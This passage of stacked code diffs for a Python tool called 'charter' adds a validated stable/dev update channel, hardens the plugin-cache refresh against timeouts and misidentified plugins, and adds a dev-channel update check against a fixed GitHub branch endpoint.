     if "density" in section and not took_slots:
         out["slots"] = density_slots(out["density"])
     return out
+
+
+#: The channels ``[update] channel`` may name, and a CLOSED set — the single most
+#: important property in this module's newest section.
+#:
+#: ``charter.toml`` is COMMITTED. It arrives from someone else's machine, which is what
+#: makes every value in it untrusted input (README.md's containment rule), and charter has
+#: already been bitten twice by exactly that: ``[frame] hotkey`` reached tmux CONFIG TEXT
+#: where a newline achieved code execution at launch (see :data:`_HOTKEY_RE`), and a
+#: committed ``mcp.json`` key currently injects YAML (#453). A channel decides how charter
+#: INSTALLS ITSELF, so a third door here would be the most expensive of the three.
+#:
+#: The defence is not a sanitiser. It is that a channel is one of two constants charter
+#: wrote itself, matched here, and nothing an operator can type is ever passed through —
+#: the same shape :data:`FRAME_DENSITY` chose for its level names, and stronger than any
+#: escaping, because there is no value that survives to be escaped. Downstream the channel
+#: is only ever COMPARED (``channel() == "dev"``); the repository URL and the installer
+#: argv are module constants in `charter.commands_update`, never assembled from this.
+UPDATE_CHANNELS = ("stable", "dev")
+
+#: Every ``[update]`` setting, in the shape :data:`FRAME_FIELDS` documents: keyed by the
+#: name :func:`update_of` returns it under, paired with ``(default, toml_key)``. One key
+#: today; the shape is the point, so a second one cannot be added to a defaults dict and
+#: forgotten in a spellings dict.
+#:
+#: ``stable`` is the default, and the default is what an unreadable, misspelt or hostile
+#: value degrades to. That direction is deliberate: stable installs a signed, published
+#: release, dev installs whatever ``main`` says this minute, so a plane that cannot be
+#: understood must land on the conservative one.
+UPDATE_FIELDS = {
+    "channel": ("stable", "channel"),
+}
+
+#: The plain ``{key: default}`` view of :data:`UPDATE_FIELDS`.
+UPDATE_DEFAULTS = {key: default for key, (default, _toml_key) in UPDATE_FIELDS.items()}
+
+
+def update_of(cfg: dict) -> dict:
+    """The ``[update]`` section merged over :data:`UPDATE_DEFAULTS`.
+
+    Same contract as :func:`frame_of`, for the same reason: this module is imported by
+    every command including ``charter --version``, so a hand-edited charter.toml must
+    degrade to the defaults rather than raise.
+
+    ``channel`` is matched against :data:`UPDATE_CHANNELS` and **the matched constant is
+    what is stored, never the object the file supplied**. Belt and braces — ``tomllib``
+    only ever produces a plain ``str`` — but it makes the guarantee structural rather than
+    dependent on the parser: no object originating in a committed file can reach a caller
+    of this function, so no caller can be the place that interpolates one.
+    """
+    out = dict(UPDATE_DEFAULTS)
+    section = cfg.get("update")
+    if not isinstance(section, dict):
+        return out
+    value = section.get(UPDATE_FIELDS["channel"][1])
+    if isinstance(value, str):
+        for known in UPDATE_CHANNELS:
+            if value == known:
+                out["channel"] = known       # the constant, not the file's string
+                break
+    return out

--- a/charter/plugincache.py
+++ b/charter/plugincache.py
@@ -38,12 +38,35 @@ from pathlib import Path
 
 from . import util
 
-#: How long any one `claude plugin …` call may take. `list` measured at ~0.2s; `install`
-#: fetches from the marketplace clone on disk but `marketplace update` reaches the network,
-#: so the budget is the network one. Bounded rather than open-ended because `doctor` runs
-#: as a SessionStart preflight with a 20s budget for every check it makes.
-LIST_TIMEOUT = 15
+#: How long a `claude plugin … --json` READ may take, in seconds.
+#:
+#: **Equal to `doctor.CHECK_TIMEOUT`, and a test pins the two together.** These reads run
+#: inside a `doctor` check, and `doctor` runs as a SessionStart preflight whose whole hook
+#: budget is 20s — so a per-call budget of 15s, made twice, was 30s against 20s. The first
+#: version of this constant cited that 20s budget in its own comment while exceeding it,
+#: which is exactly the mistake `CHECK_TIMEOUT` exists to make impossible. Measured cost is
+#: 0.22s and 0.27s; the number only matters in the pathological case, which is the only
+#: case it is for.
+LIST_TIMEOUT = 5.0
+
+#: The mutating half is a different budget because it is a different job: `marketplace
+#: update` fetches from GitHub and `install` copies a repository-sized tree. It runs from
+#: `charter update` — a command a person typed and is waiting on — never from a check.
 REFRESH_TIMEOUT = 120
+
+#: "I could not look", as distinct from "there is nothing installed".
+#:
+#: Not the same answer, and `doctor` renders them differently: an absent plugin is a green
+#: row (CLI-only is a supported install), while a `claude plugin list` that could not be
+#: read is a WARN carrying `_NOT_CHECKED_HINT`. Collapsing them into one ``None`` put a
+#: green *"the charter plugin is not installed here"* in front of anyone whose `claude` is
+#: too old to understand `--json` — precisely the population most likely to be running a
+#: stale plugin, and precisely the defect the #171 audit removed everywhere else ("a check
+#: that silently does nothing is worse than no check").
+#:
+#: A sentinel compared with ``is``, rather than a third return type: the same shape
+#: `hooks.dispatched_handlers` uses to keep the same distinction.
+UNKNOWN = object()
 
 #: The directories a Claude Code plugin actually LOADS, and therefore the only ones whose
 #: drift means anything.
@@ -78,6 +101,12 @@ _SCOPES = ("user", "project", "local")
 #: The marketplace-side half of the same rule.
 _MARKETPLACE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
 
+#: The one plugin id charter recognises as its own — see :func:`installed_charter_plugin`
+#: for why this is exact rather than `charter@<any marketplace>`. Both halves are the
+#: ``name`` in charter's own ``.claude-plugin/plugin.json`` and ``marketplace.json``, and
+#: `tests/test_plugin.py` already pins those two to each other.
+PLUGIN_ID = "charter@charter"
+
 
 def available() -> bool:
     """True when the `claude` CLI is on PATH. False is an ordinary answer, not a fault —
@@ -91,12 +120,32 @@ def _claude_json(args: list[str], cwd=None, timeout: float = LIST_TIMEOUT):
 
     ``None`` and ``[]`` are different answers and both are load-bearing downstream: "I
     could not look" must never render as "there is nothing installed", which is the
-    confidently-wrong output `hooks.dispatched_handlers` documents at length.
+    confidently-wrong output `hooks.dispatched_handlers` documents at length. See
+    :data:`UNKNOWN` for how the caller keeps that distinction.
+
+    **Every way out is a return, never a raise**, and that is not defensive padding — it
+    is what stops one row taking the whole preflight down. `doctor._checks()` builds its
+    results with an eager list literal and has no per-check guard, and `hooks/hooks.json`
+    renders a non-zero `charter doctor` as *"charter preflight failed - fix before
+    working:"* at every SessionStart. A `claude` that does not return therefore printed
+    **zero rows** and a scary line, which is the precise failure `iter_all`'s streaming and
+    :data:`~charter.doctor.CHECK_TIMEOUT` were introduced to prevent.
+
+    Two exceptions get out of `util.run` and both are real:
+
+    * `util.ProcTimeout` — a `claude` that hangs. `util.run` raises it regardless of
+      ``check``, so ``check=False`` does not cover it.
+    * `OSError` — `shutil.which` in :func:`available` and the exec here are two moments,
+      and a `claude` removed between them is a `FileNotFoundError` that would otherwise
+      reach the crash reporter.
     """
     if not available():
         return None
-    proc = util.run(["claude", "plugin", *args, "--json"], cwd=cwd, check=False,
-                    timeout=timeout)
+    try:
+        proc = util.run(["claude", "plugin", *args, "--json"], cwd=cwd, check=False,
+                        timeout=timeout)
+    except (util.ProcTimeout, OSError):
+        return None
     if proc.returncode != 0:
         return None
     try:
@@ -105,9 +154,18 @@ def _claude_json(args: list[str], cwd=None, timeout: float = LIST_TIMEOUT):
         return None
 
 
-def installed_charter_plugin(prefer_project=None) -> dict | None:
-    """The installed charter plugin entry, or ``None`` when there is not exactly one to act
-    on.
+def installed_charter_plugin(prefer_project=None):
+    """The installed charter plugin entry — or :data:`UNKNOWN`, or ``None``.
+
+    **Three answers, because there are three states**, and the middle one is the whole
+    point:
+
+    * an entry — charter's plugin is installed and charter is willing to act on it;
+    * :data:`UNKNOWN` — `claude plugin list --json` could not be read. An older `claude`
+      that does not understand ``--json``, a hang, a `claude` removed from PATH mid-call,
+      malformed output. Nothing is known.
+    * ``None`` — the list was read and charter's plugin is not in it. CLI-only is a
+      supported install (`docs/install.md`), so this is an ordinary, green state.
 
     *prefer_project* picks between several. charter's plugin is normally installed at
     ``project`` scope, once per project, and every one of those installs points at the SAME
@@ -116,21 +174,36 @@ def installed_charter_plugin(prefer_project=None) -> dict | None:
     project's `claude plugin` invocation performs it, and running it against the plane you
     are standing in is the least surprising choice.
 
-    Returns the raw entry (``id``, ``scope``, ``installPath``, ``projectPath``) with the
-    two fields that reach an argv already validated — an entry charter would refuse to act
-    on is not returned at all, so no caller has to remember to check.
+    The returned entry has the two fields that reach an argv already validated — an entry
+    charter would refuse to act on is not returned at all, so no caller has to remember to
+    check.
+
+    **Only ``charter@charter``.** `docs/install.md` says `claude plugin marketplace add
+    diazoxide/charter`, and the name a marketplace registers under is the one its own
+    `marketplace.json` declares — ``charter`` — so that is the id anyone who followed the
+    documentation has. Matching `charter@<anything>` instead would let charter UNINSTALL a
+    plugin called `charter` published by somebody else's marketplace, which is not
+    charter's to touch. A plugin outside that id reads as "not installed" here, which is
+    the honest answer: charter cannot identify it as its own.
     """
     entries = _claude_json(["list"])
+    if entries is None:
+        return UNKNOWN
     if not isinstance(entries, list):
-        return None
+        return UNKNOWN          # `--json` answered something that is not a list of rows
     ours = []
     for e in entries:
         if not isinstance(e, dict):
             continue
         pid = e.get("id")
-        if not isinstance(pid, str) or not _PLUGIN_ID_RE.match(pid):
-            continue
-        if pid.split("@", 1)[0] != "charter":
+        # Equality against a module constant, and NOT also `_PLUGIN_ID_RE` — which used to
+        # sit on the line above and became dead the moment this narrowed to one id. An
+        # equality test against a constant is strictly stronger than any pattern: what
+        # survives it IS the constant. The regex was kept for a while as "defence in
+        # depth", which is the honest name for a check no test can distinguish from its own
+        # absence; `refresh_argvs` still applies it, because that function takes an id from
+        # a caller rather than producing one.
+        if pid != PLUGIN_ID:
             continue
         if e.get("scope") not in _SCOPES:
             continue
@@ -149,9 +222,10 @@ def installed_charter_plugin(prefer_project=None) -> dict | None:
 def marketplace_clone(name: str) -> Path | None:
     """Where the marketplace named *name* is cloned, or ``None``.
 
-    *name* comes from a plugin id charter has already matched against
-    :data:`_PLUGIN_ID_RE`; it is re-checked here because this function is also reachable
-    on its own, and a path built from an unchecked name is a path.
+    Its one caller in `doctor` splits *name* off :data:`PLUGIN_ID`, so it is a constant by
+    the time it arrives. Checked anyway, because that is a fact about today's callers and
+    not about this function: it is reachable on its own, and a path built from an unchecked
+    name is a path.
     """
     if not isinstance(name, str) or not _MARKETPLACE_RE.match(name):
         return None
@@ -270,13 +344,26 @@ def force_refresh(prefer_project=None) -> tuple[bool, str]:
     a `claude plugin` call that failed.
 
     **This is not a rollback-capable operation.** The uninstall step is what makes the
-    install step do anything, so a failure between them leaves the plugin uninstalled for
-    that scope — recoverable with the one command named in the returned detail, and named
-    there for exactly that reason.
+    install step do anything, so a failure between them leaves the plugin **uninstalled**
+    for that scope. That is the one outcome that must not be reported as a generic command
+    failure: the returned detail leads with what the operator now has and the command that
+    restores it, because by the time this runs the CLI has already been replaced and the
+    harness artifact already moved — the operator is several steps in, and a line naming
+    only the argv that failed leaves them to work out that a plugin went missing.
+
+    **It never raises.** `_refresh_plugin` promises "best-effort, never fatal", and that
+    promise was false while `util.run` here was unguarded: `ProcTimeout` at 120s, or a
+    `claude` removed from PATH between :func:`available` and the exec, propagated out
+    through `_update_dev` and `cmd_update` — turning a plugin that could not be refreshed
+    into an update that ends in a traceback, after the install it was reporting on
+    succeeded.
     """
     if not available():
         return False, "the `claude` CLI is not on PATH, so there is no plugin to refresh"
     entry = installed_charter_plugin(prefer_project)
+    if entry is UNKNOWN:
+        return False, ("could not read `claude plugin list --json`, so charter does not "
+                       "know what is installed and will not uninstall anything")
     if entry is None:
         return False, "no charter plugin is installed here (`claude plugin list`)"
     argvs = refresh_argvs(entry["id"], entry["scope"])
@@ -289,10 +376,30 @@ def force_refresh(prefer_project=None) -> tuple[bool, str]:
     cwd = entry.get("projectPath") if entry.get("scope") == "project" else None
     if cwd is not None and not Path(cwd).is_dir():
         cwd = None
+    uninstalled = False
     for argv in argvs:
-        proc = util.run(argv, cwd=cwd, check=False, timeout=REFRESH_TIMEOUT)
+        try:
+            proc = util.run(argv, cwd=cwd, check=False, timeout=REFRESH_TIMEOUT)
+        except (util.ProcTimeout, OSError) as e:
+            return False, _failed(argv, str(e) or type(e).__name__, uninstalled, argvs[2])
         if proc.returncode != 0:
             why = (proc.stderr or proc.stdout or "").strip().splitlines()
-            detail = why[-1][:200] if why else f"exit {proc.returncode}"
-            return False, f"`{' '.join(argv)}` failed: {detail}"
+            return False, _failed(argv, why[-1][:200] if why else f"exit {proc.returncode}",
+                                  uninstalled, argvs[2])
+        if argv is argvs[1]:
+            uninstalled = True
     return True, f"{entry['id']} reinstalled from the marketplace clone"
+
+
+def _failed(argv: list[str], why: str, uninstalled: bool, reinstall: list[str]) -> str:
+    """The detail line for a refresh that stopped part-way.
+
+    Two different sentences for two different states, because they need two different
+    things from the reader. Before the uninstall, nothing has changed and the failed
+    command is the whole story. After it, the plugin is GONE for that scope and the reader
+    needs the command that brings it back before they need to know which step broke.
+    """
+    if not uninstalled:
+        return f"`{' '.join(argv)}` failed: {why}"
+    return (f"the plugin is now UNINSTALLED — `{' '.join(argv)}` failed ({why}). "
+            f"Restore it: {' '.join(reinstall)}")

--- a/charter/plugincache.py
+++ b/charter/plugincache.py
@@ -1,0 +1,298 @@
+"""The installed Claude Code plugin versus the marketplace clone it came from.
+
+``claude plugin update charter@charter`` compares **version strings**, and charter's plugin
+version moves exactly once per release. The marketplace, meanwhile, is a git clone of
+``main`` that Claude Code re-fetches on its own — so between releases the clone advances
+and the installed copy does not, both keep saying ``0.51.0``, and the update command
+correctly reports there is nothing to do. Measured on one machine at the time this was
+written: 45 files differing, ``skills/secrets/SKILL.md`` and ``skills/browser/SKILL.md``
+among them.
+
+**The staleness that bites is the skills.** ``hooks/hooks.json`` invokes ``charter hook …``
+— the *command*, resolved from ``PATH``, i.e. the ``uv tool`` install — so hook behaviour
+follows the CLI and not the plugin's bundled copy of ``charter/*.py``. Skills are different:
+they are text the model loads, and a stale one is wrong instructions delivered confidently.
+
+Two callers, one mechanism:
+
+* `doctor.check_plugin_freshness` compares by CONTENT, which is the question a version
+  string cannot answer.
+* `commands_update` force-refreshes on the dev channel, where a version-keyed update can
+  never see the change.
+
+**Everything here talks to `claude plugin … --json`, never to Claude Code's files.**
+``~/.claude/plugins/installed_plugins.json``, ``known_marketplaces.json`` and the cache
+layout are internals charter does not own; `update.plugin_version_here` already carries
+the lesson (``bin/edm`` bet on an internal path and broke silently, #197). ``claude plugin
+list --json`` and ``claude plugin marketplace list --json`` are documented CLI surfaces
+that answer the same questions, and they cost ~0.2s each.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import json
+import re
+import shutil
+from pathlib import Path
+
+from . import util
+
+#: How long any one `claude plugin …` call may take. `list` measured at ~0.2s; `install`
+#: fetches from the marketplace clone on disk but `marketplace update` reaches the network,
+#: so the budget is the network one. Bounded rather than open-ended because `doctor` runs
+#: as a SessionStart preflight with a 20s budget for every check it makes.
+LIST_TIMEOUT = 15
+REFRESH_TIMEOUT = 120
+
+#: The directories a Claude Code plugin actually LOADS, and therefore the only ones whose
+#: drift means anything.
+#:
+#: charter's marketplace entry is ``"source": "./"`` — the whole repository is copied into
+#: the cache, ``tests/`` and ``docs/`` and all — so hashing the copy wholesale would report
+#: a test-file edit as a stale plugin. That is not a stricter check, it is a noisier one:
+#: `doctor`'s own comments keep returning to the point that a row which warns about
+#: something benign trains people to scroll past the row, which costs the case that
+#: matters. These five are the surface Claude Code reads.
+#:
+#: ``commands`` and ``agents`` are listed although charter ships neither today. A plugin
+#: directory added later is loaded by the host whether or not this tuple was updated, and
+#: the cost of naming it now is nothing (a missing entry is skipped); the cost of not
+#: naming it is a category of drift this module reports as clean.
+PLUGIN_SURFACE = (".claude-plugin", "hooks", "skills", "commands", "agents")
+
+#: What a plugin id may look like before it is allowed near an argv.
+#:
+#: These values are read out of `claude plugin list --json` — a machine's own output, not
+#: a committed file, so this is a narrower hazard than `charter.toml`'s. It is still input.
+#: `util.run` takes a list and never a shell string, so the shell is not the exposure; the
+#: exposure is an element that begins with ``-`` and is read by `claude` as a FLAG rather
+#: than as the plugin to uninstall. This alphabet has no leading dash and no whitespace.
+_PLUGIN_ID_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}@[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
+
+#: The scopes `claude plugin install|uninstall --scope` accepts. A closed set for the same
+#: reason `instance.UPDATE_CHANNELS` is one: the value reaches an argv, and matching it
+#: against constants charter wrote means nothing read from anywhere is ever passed through.
+_SCOPES = ("user", "project", "local")
+
+#: The marketplace-side half of the same rule.
+_MARKETPLACE_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")
+
+
+def available() -> bool:
+    """True when the `claude` CLI is on PATH. False is an ordinary answer, not a fault —
+    charter supports opencode and Codex, and a plane on either has no Claude Code plugin
+    to be stale."""
+    return bool(shutil.which("claude"))
+
+
+def _claude_json(args: list[str], cwd=None, timeout: float = LIST_TIMEOUT):
+    """Run ``claude plugin <args> --json`` and parse it. ``None`` on any failure.
+
+    ``None`` and ``[]`` are different answers and both are load-bearing downstream: "I
+    could not look" must never render as "there is nothing installed", which is the
+    confidently-wrong output `hooks.dispatched_handlers` documents at length.
+    """
+    if not available():
+        return None
+    proc = util.run(["claude", "plugin", *args, "--json"], cwd=cwd, check=False,
+                    timeout=timeout)
+    if proc.returncode != 0:
+        return None
+    try:
+        return json.loads(proc.stdout or "")
+    except (ValueError, TypeError):
+        return None
+
+
+def installed_charter_plugin(prefer_project=None) -> dict | None:
+    """The installed charter plugin entry, or ``None`` when there is not exactly one to act
+    on.
+
+    *prefer_project* picks between several. charter's plugin is normally installed at
+    ``project`` scope, once per project, and every one of those installs points at the SAME
+    versioned cache directory — so refreshing any of them repopulates the cache for all of
+    them. Which one is chosen therefore does not change the outcome; it changes which
+    project's `claude plugin` invocation performs it, and running it against the plane you
+    are standing in is the least surprising choice.
+
+    Returns the raw entry (``id``, ``scope``, ``installPath``, ``projectPath``) with the
+    two fields that reach an argv already validated — an entry charter would refuse to act
+    on is not returned at all, so no caller has to remember to check.
+    """
+    entries = _claude_json(["list"])
+    if not isinstance(entries, list):
+        return None
+    ours = []
+    for e in entries:
+        if not isinstance(e, dict):
+            continue
+        pid = e.get("id")
+        if not isinstance(pid, str) or not _PLUGIN_ID_RE.match(pid):
+            continue
+        if pid.split("@", 1)[0] != "charter":
+            continue
+        if e.get("scope") not in _SCOPES:
+            continue
+        ours.append(e)
+    if not ours:
+        return None
+    if prefer_project is not None:
+        want = str(Path(prefer_project).resolve())
+        for e in ours:
+            got = e.get("projectPath")
+            if isinstance(got, str) and str(Path(got).resolve()) == want:
+                return e
+    return ours[0]
+
+
+def marketplace_clone(name: str) -> Path | None:
+    """Where the marketplace named *name* is cloned, or ``None``.
+
+    *name* comes from a plugin id charter has already matched against
+    :data:`_PLUGIN_ID_RE`; it is re-checked here because this function is also reachable
+    on its own, and a path built from an unchecked name is a path.
+    """
+    if not isinstance(name, str) or not _MARKETPLACE_RE.match(name):
+        return None
+    rows = _claude_json(["marketplace", "list"])
+    if not isinstance(rows, list):
+        return None
+    for row in rows:
+        if not isinstance(row, dict) or row.get("name") != name:
+            continue
+        loc = row.get("installLocation")
+        if isinstance(loc, str) and loc:
+            p = Path(loc)
+            return p if p.is_dir() else None
+    return None
+
+
+def content_hash(root) -> str | None:
+    """A stable digest of the plugin surface under *root*, or ``None`` if it cannot be read.
+
+    Path and bytes both go into the digest, so a file that is renamed, added or deleted
+    changes it as surely as an edited one does. Entries are sorted, so two trees that hold
+    the same files hash the same regardless of directory-iteration order. Symlinks are not
+    followed and directories are walked with :meth:`Path.rglob`, which does not.
+    """
+    root = Path(root)
+    if not root.is_dir():
+        return None
+    h = hashlib.sha256()
+    try:
+        for rel in sorted(_surface_files(root)):
+            h.update(rel.encode("utf-8"))
+            h.update(b"\0")
+            h.update(hashlib.sha256((root / rel).read_bytes()).digest())
+    except OSError:
+        return None
+    return h.hexdigest()
+
+
+def _surface_files(root: Path) -> list[str]:
+    """Every plugin-surface file under *root*, as POSIX relative paths."""
+    out = []
+    for name in PLUGIN_SURFACE:
+        base = root / name
+        if not base.is_dir():
+            continue
+        for p in base.rglob("*"):
+            if p.is_file() and not p.is_symlink():
+                out.append(p.relative_to(root).as_posix())
+    return out
+
+
+def differing(installed, clone, limit: int = 3) -> list[str]:
+    """Up to *limit* surface paths that differ between the two trees, for the report line.
+
+    The hash says *whether*; this says *which*, and a doctor row that names
+    ``skills/secrets/SKILL.md`` is the difference between a number a reader distrusts and
+    a fact they can go and look at.
+    """
+    installed, clone = Path(installed), Path(clone)
+    try:
+        left, right = set(_surface_files(installed)), set(_surface_files(clone))
+    except OSError:
+        return []
+    out = []
+    for rel in sorted(left | right):
+        if len(out) >= limit:
+            break
+        if rel not in left or rel not in right:
+            out.append(rel)
+            continue
+        try:
+            if (installed / rel).read_bytes() != (clone / rel).read_bytes():
+                out.append(rel)
+        except OSError:
+            out.append(rel)
+    return out
+
+
+def refresh_argvs(plugin_id: str, scope: str) -> list[list[str]] | None:
+    """The three commands that force the installed plugin back into step, in order.
+
+    ``None`` if either input fails its check, so a caller cannot run a partial sequence
+    against a value charter would not have built an argv from.
+
+    The order is the mechanism, verified end to end rather than reasoned about:
+
+    1. ``marketplace update`` — advance the clone. Skip it and the reinstall faithfully
+       re-copies the same stale content.
+    2. ``uninstall`` — the install step is a no-op against an already-installed plugin
+       (measured: *"Plugin is already installed"*, cache untouched), so this is what makes
+       step 3 do any work at all.
+    3. ``install`` — which re-copies the marketplace clone over the versioned cache
+       directory, sentinel edit and all.
+
+    ``-y`` on both mutating steps because charter runs them non-interactively; `claude`
+    requires it when stdout is not a TTY and would otherwise refuse rather than prompt.
+    """
+    if not isinstance(plugin_id, str) or not _PLUGIN_ID_RE.match(plugin_id):
+        return None
+    if scope not in _SCOPES:
+        return None
+    marketplace = plugin_id.split("@", 1)[1]
+    return [
+        ["claude", "plugin", "marketplace", "update", marketplace],
+        ["claude", "plugin", "uninstall", plugin_id, "--scope", scope, "-y"],
+        ["claude", "plugin", "install", plugin_id, "--scope", scope, "-y"],
+    ]
+
+
+def force_refresh(prefer_project=None) -> tuple[bool, str]:
+    """Re-copy the marketplace clone over the installed plugin. ``(ok, detail)``.
+
+    ``(False, …)`` covers every way this can decline, and each of them is a real state a
+    charter user is in rather than a defensive branch: no `claude` on PATH (opencode or
+    Codex), no charter plugin installed (CLI-only, which `docs/install.md` supports), and
+    a `claude plugin` call that failed.
+
+    **This is not a rollback-capable operation.** The uninstall step is what makes the
+    install step do anything, so a failure between them leaves the plugin uninstalled for
+    that scope — recoverable with the one command named in the returned detail, and named
+    there for exactly that reason.
+    """
+    if not available():
+        return False, "the `claude` CLI is not on PATH, so there is no plugin to refresh"
+    entry = installed_charter_plugin(prefer_project)
+    if entry is None:
+        return False, "no charter plugin is installed here (`claude plugin list`)"
+    argvs = refresh_argvs(entry["id"], entry["scope"])
+    # Unreachable through `installed_charter_plugin`, which already refuses an entry it
+    # would not act on — and kept anyway, because the alternative is `refresh_argvs`
+    # returning `None` into a `for argv in None`. Two checks of one rule is the cheap
+    # failure; one check that a refactor moves is the expensive one.
+    if argvs is None:
+        return False, "the installed plugin's id or scope is not one charter will act on"
+    cwd = entry.get("projectPath") if entry.get("scope") == "project" else None
+    if cwd is not None and not Path(cwd).is_dir():
+        cwd = None
+    for argv in argvs:
+        proc = util.run(argv, cwd=cwd, check=False, timeout=REFRESH_TIMEOUT)
+        if proc.returncode != 0:
+            why = (proc.stderr or proc.stdout or "").strip().splitlines()
+            detail = why[-1][:200] if why else f"exit {proc.returncode}"
+            return False, f"`{' '.join(argv)}` failed: {detail}"
+    return True, f"{entry['id']} reinstalled from the marketplace clone"

--- a/charter/statusline.py
+++ b/charter/statusline.py
@@ -1747,15 +1747,34 @@ def _session_strip(payload: dict, sid: str | None) -> str:
 
 
 def _brand() -> str:
-    """`⬢ charter x.y.z`, plus `↑ a.b.c` when a newer release is cached.
+    """`⬢ charter x.y.z`, plus `dev` on the dev channel, plus `↑ a.b.c` when something
+    newer is cached.
 
     Read-only and offline: the version is this process's own, and the "newer?"
     answer comes from a cache another process fills. `update.maybe_spawn` may fork
     a detached child, but nothing here ever waits on the network — the status line
     renders on every turn.
+
+    **The `dev` chip is about the CHANNEL, not the build**, and that is what earns it a
+    place on a line this crowded. Which build is installed is already visible — `charter
+    --version` prints `0.51.0+dev (main @ abc1234)` — and it is visible on the one surface
+    nobody looks at during a session. What the operator cannot otherwise tell, at the
+    moment it matters, is which channel this plane is on: whether `↑` means *a release was
+    published* or *main moved*, and therefore what `charter update` is about to install.
+    Two different answers behind one arrow; the chip is what separates them.
+
+    It also names the state where channel and build disagree without needing a word for
+    it. A plane that declares dev while still running the PyPI wheel renders `dev ↑a1b2c3d`,
+    because `update.newer_head` counts "installed from no commit at all" as behind.
     """
-    from . import __version__, update
+    from . import __version__, channel, update
     out = f"{_DIM}⬢ charter {__version__}{_R}"
+    try:
+        dev = channel.is_dev()
+    except Exception:
+        dev = False
+    if dev:
+        out += f" {_DIM}dev{_R}"
     try:
         update.maybe_spawn()
         newer = update.newer_than(__version__)

--- a/charter/update.py
+++ b/charter/update.py
@@ -7,6 +7,16 @@ PyPI therefore costs a stale indicator, never a delayed prompt.
 
 The check is deliberately unauthenticated and read-only — one GET of the JSON
 metadata endpoint. Nothing is downloaded, installed or executed.
+
+**The dev channel changes what "newer" means, and nothing else here.** On a plane that
+declares ``[update] channel = "dev"`` there is no published version to compare against —
+dev builds are never published (see :mod:`charter.channel` for why) — so "newer" becomes
+*``main``'s head commit is not the commit this build was installed from*. That answer is
+fetched, cached, TTL'd, cooled down and read on exactly the same terms as the PyPI one:
+same cache file, same :data:`REFRESH_TTL`, same :data:`SPAWN_COOLDOWN`, same
+:data:`NET_TIMEOUT`, same unauthenticated read-only GET, and the same absolute rule that
+the render path only ever reads the cache. A second mechanism beside those brakes would
+be a second thing to keep honest; there is one.
 """
 
 from __future__ import annotations
@@ -23,6 +33,20 @@ from . import config, util
 #: (PyPI would not allow `charter`), so the metadata lives under the latter.
 DIST = "charter-cp"
 _URL = f"https://pypi.org/pypi/{DIST}/json"
+
+#: The repository the dev channel tracks, and the branch it tracks on it. **Constants,
+#: not configuration.** ``charter.toml`` decides *whether* charter follows the dev channel
+#: and never *what* it follows — a committed file that could name the repository would be
+#: a committed file that decides which code your machine installs. Written out in two
+#: pieces so the two URLs below are the only places they are joined, and so neither join
+#: ever has a runtime value in it.
+DEV_REPO = "diazoxide/charter"
+DEV_BRANCH = "main"
+
+#: One unauthenticated read-only GET, exactly like ``_URL`` above: the branch endpoint of
+#: the public GitHub REST API, which answers with the head commit and needs no token for a
+#: public repository. Nothing is downloaded, installed or executed by reading it.
+_BRANCH_URL = f"https://api.github.com/repos/{DEV_REPO}/branches/{DEV_BRANCH}"
 
 REFRESH_TTL = 24 * 3600   # re-check at most once a day — releases are not that frequent
 SPAWN_COOLDOWN = 3600     # and at most one background attempt per hour, success or not
@@ -108,8 +132,44 @@ def _parse(v: str) -> tuple:
     return tuple(out)
 
 
+def newer_head() -> str | None:
+    """The dev channel's answer to "is there anything newer?" — a short commit, or None.
+
+    Cache only. Like :func:`newer_than`, whose dev branch this is, it is called from the
+    status line's render path and must never reach the network; `maybe_spawn` is what
+    fills the cache, in a detached child.
+
+    Three states, and the middle one is the reason this is not a plain equality test:
+
+    * no cached head — nothing has been fetched yet, or the fetch failed. Say nothing.
+      An indicator that appears because a check did not happen is worse than no indicator.
+    * head equals the installed commit — current. Say nothing.
+    * anything else — behind, and that deliberately INCLUDES an install with no commit at
+      all. A plane that declares the dev channel while running the PyPI wheel has not got
+      what it asked for, and the nudge is how it finds out; ``charter update`` moves it.
+    """
+    from . import channel
+
+    head = (load().get("head") or "").strip()
+    if not head:
+        return None
+    mine = channel.installed_commit()
+    return None if mine and mine == head else head[:7]
+
+
 def newer_than(current: str) -> str | None:
-    """The cached latest version if it is strictly newer than *current*, else None."""
+    """The cached latest version if it is strictly newer than *current*, else None.
+
+    On the dev channel this hands off to :func:`newer_head` instead: there is no published
+    version to be newer than, so the comparison is against ``main``'s head commit. The
+    channel is read from `charter.channel`, which reads it from the config boundary where
+    it has already been clamped to a closed set — this function never sees an operator's
+    string, only a branch on one of two constants.
+    """
+    from . import channel
+
+    if channel.is_dev():
+        return newer_head()
     latest = (load().get("latest") or "").strip()
     if not latest or not current:
         return None
@@ -144,18 +204,70 @@ def latest_display(installed: str) -> str:
     return latest
 
 
-def fetch_and_store() -> str | None:
-    """Query PyPI and cache the result. Runs in the detached child, never inline."""
+def _fetch_latest() -> str | None:
+    """One unauthenticated GET of PyPI's JSON metadata endpoint."""
     import urllib.request
     try:
         with urllib.request.urlopen(_URL, timeout=NET_TIMEOUT) as r:
-            latest = json.load(r)["info"]["version"]
+            return json.load(r)["info"]["version"]
     except Exception:
         return None
+
+
+def _fetch_head() -> str | None:
+    """One unauthenticated GET of the public branch endpoint — ``main``'s head commit.
+
+    The URL is :data:`_BRANCH_URL`, built at import from two module constants. Nothing
+    from ``charter.toml`` reaches it, on any path: the channel decides *whether* this runs
+    and never *where* it points. Only a full 40-character hex commit id is accepted, so a
+    surprising response body cannot put arbitrary text into the cache that the status line
+    then renders.
+    """
+    import urllib.request
+    try:
+        with urllib.request.urlopen(_BRANCH_URL, timeout=NET_TIMEOUT) as r:
+            sha = json.load(r)["commit"]["sha"]
+    except Exception:
+        return None
+    if not isinstance(sha, str):
+        return None
+    sha = sha.strip()
+    return sha if len(sha) == 40 and all(c in "0123456789abcdef" for c in sha.lower()) else None
+
+
+def fetch_and_store() -> str | None:
+    """Query PyPI — and on the dev channel, ``main``'s head — and cache the result.
+    Runs in the detached child, never inline. Returns the published version, as before.
+
+    **The record is merged, not replaced.** Two answers now live in one cache file, and a
+    write that rebuilt the dict from scratch would drop whichever of them this call could
+    not fetch: an offline moment on a dev plane would erase the published version the
+    version-lock rows read, for no better reason than that the other GET failed.
+
+    **``ts`` is stamped only when everything this channel asked for arrived.** ``ts`` is
+    what :func:`maybe_spawn` measures :data:`REFRESH_TTL` against, so stamping it after a
